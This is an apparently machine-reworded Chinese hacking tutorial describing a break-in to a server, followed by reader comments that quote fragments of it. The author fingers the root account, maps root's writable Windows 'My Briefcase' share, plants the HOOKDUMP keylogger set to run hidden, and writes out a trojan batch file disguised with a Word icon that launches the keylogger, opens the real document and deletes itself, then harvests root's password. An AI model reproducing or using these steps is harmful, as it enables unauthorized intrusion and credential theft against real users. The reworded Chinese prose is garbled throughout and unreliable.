如何入侵Linux操作系统
近期发觉了网站页面,因此基本侵入。非常好,它的FINGER开着,因此我编了1个SHELL,aaa账号试到zzz(by the way,它是我明白了的1个网站周期性,这是账号的长短与口今的強度正相关, 假如1个账号只能两三位长,那它的口今通常也非常简单,反之亦然,故且称作若氏定理吧),結果1个账号也找不到,也没有再试它的账号。由于把我它开的网关迷住了,它开着WWW,我也不相信它不错误。接连拿了四种CGI和WWW扫描枪累计扫了三四百种普遍不正确它基本上都找不到。:( 好多个不正确,但我也不知道怎样运用,散了吧。又绕着服务器转了两圈,象刺猬遇上刺猬,难以下嘴。
還是看一下root的消息吧:
finger root@xxx.xxx.xxx
Login name: root In real life: system PRIVILEGED account
Directory: / Shell: /bin/sh
Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
No Plan.
root常常来,哪个202.xx.xx.xx也是它用的服务中心了,从那会否见到点物品呢?
net view \202.xx.xx.xx
Shared resources at \202.xx.xx.xx
Sharename Type Comment
x
x
我的公文包
The command was completed successfully.
在上外网的设备上开着WINDOWS的“文档和打印机共享”的业务,是许多人易于心存侥幸的,这一root沒有列外。假如它的C盘分享了并且可写那就好了,但那就是作梦,如今开过分享的文件名沒有1个是主目录,连D驱的也没有。别急,等一等。x掉的这些我的文档都不起作用,不可以写,里边尽是些英文原著,这一root还挺行的。“我的公文包”打动了我的留意,它是1个用以将不一样的设备上的材料开展同歩的道具,很毫无疑问这一root要常常升级服务器上的首页,偶尔在自身的设备上编,偶尔在服务器上编……因此很关键的一些:“我的公文包”的分享通常全是可写的!
我可以再进来看一下。
>net use i: \202.xx.xx.xx
>i:
>echo asdf>temp.txt
非常好,的确可写。
>del temp.txt
无痕迹——黑客的陋习。
>dir/od/p
看一下都一些哪些…… 倒数第二排哪个是啥?“X月工作计划.doc”!也是它了,即然是方案就并不是写完后就丢一面,它显然会再度开启它的——最少下月写方案时要COPY一会儿:->
该亲手了,我的目标也是让它到时候开启时误中我的圈套而运作我藏的病毒。我此次用的是1个健盘计录手机appHOOKDUMP,我认为它挺不错的,价格性价比高,量也足…… 抱歉,说习惯一个人,应当是它不但纪录下所有击键,还纪录下开启或关闭了哪些系统、按过哪些按纽、试过哪些莱单…… 换句话说,它的纪录让我也陪你站在他身后看他使用电脑相同详尽了。您要问那麼多病毒你为什么装这一?要了解不论是我国的冰河、netspy還是国外的netbus、BO,都被各类防毒软件列入头号侦察成员变量,而1个root的设备上可不可能未装防毒软件?還是HOOKDUMP好,圆圆的,不值一提,只有假如大伙儿都用惟恐我再用它的机遇就少了……
>copy hookdump.* i:
增补一些:发送前先编好它的hookdump.ini文件,置为掩藏方法运作,否则root一运作显示屏上蹦出一整对话框可就……。
随后再在自身的设备上编1个重名的BAT文档:X月工作计划.BAT
>edit c:X月工作计划.BAT
@echo off
hookdump
attrib -h X月工作计划.doc
C:Program FilesMicrosoftOfficeWinword X月工作计划.doc
attrib -h temp.bat
del temp.pif
del temp.bat
看懂了吧?root运作了这一BAT文档事实上也是先运作病毒,再启用WINWORD文档开启它开个的这一文档,随后自身删掉,或许它设备上WINWORD的部位不一样,那启用就会不成功,只有没事儿,这样BAT会立刻删掉,他会认为是自身的操作失误。
此时你的C驱主目录总有了那么1个BAT文档,这是1个圆形的标志,和哪个WORD文档截然不同,root为什么会运作它呢?不是不可以,在这一文档上面右健,点特性,在“系统”栏选“更改图标”不可以了吗?WORD的标志在你设备C:Program FilesMicrosoftOffice中。也要将“运作”改成“最小化”,“撤出时关掉”加上勾,那样能够确保在运作时一些征兆都没有。实际上这一BAT文档变为了2个,有个PIF文档也是它的标志。
把这2个文档发上去:
>copy X月工作计划.bat i:
>copy X月工作计划.pif i:
随后把它的文档和自身的文档都藏起來:
>attrib +h X月工作计划.doc
>attrib +h X月工作计划.bat
那样,root的“公文包”里只剩下1个和原先同样的WORD标志,他作梦也想不到这已变为了1个BAT文档。随后能够喘口腔有异味了,我们一起静静地等……
几日后,我进到这一服务中心,取出记下来的击键纪录,找到root的口今,进到服务器。
相关文章
- 5条评论
晴枙淤浪2022-05-28 00:39:37- ot沒有列外。假如它的C盘分享了并且可写那就好了,但那就是作梦,如今开过分享的文件名沒有1个是主目录,连D驱的也没有。别急,等一等。x掉的这些我的文档都不起作用,不可以写,里边尽是些英文原著,这一roo
瑰颈绿邪2022-05-27 23:07:28- 近期发觉了网站页面,因此基本侵入。非常好,它的FINGER开着,因此我编了1个SHELL,aaa账号试到zzz(by the way,它是我明白了的1个网站周期性,这是账号的长短与口今的強度正相关, 假如1个账号只能两三位长,那它的口今通常也非常简单,
寻妄南戈2022-05-28 00:41:10- Shared resources at \202.xx.xx.xx Sharename Type Comment x x 我的公文包 The command was completed successfully. 在上外网的设备上开着WINDOWS的“文档
世味雾月2022-05-27 20:28:30- 启或关闭了哪些系统、按过哪些按纽、试过哪些莱单…… 换句话说,它的纪录让我也陪你站在他身后看他使用电脑相同详尽了。您要问那麼多病毒你为什么装这一?要了解不论是我国的冰河、netspy還是国外的netbus、BO,都被各类防毒软件列入头号侦察成员变量,而
囤梦雾敛2022-05-28 02:43:40- … 几日后,我进到这一服务中心,取出记下来的击键纪录,找到root的口今,进到服务器。
滇ICP备19002590号-1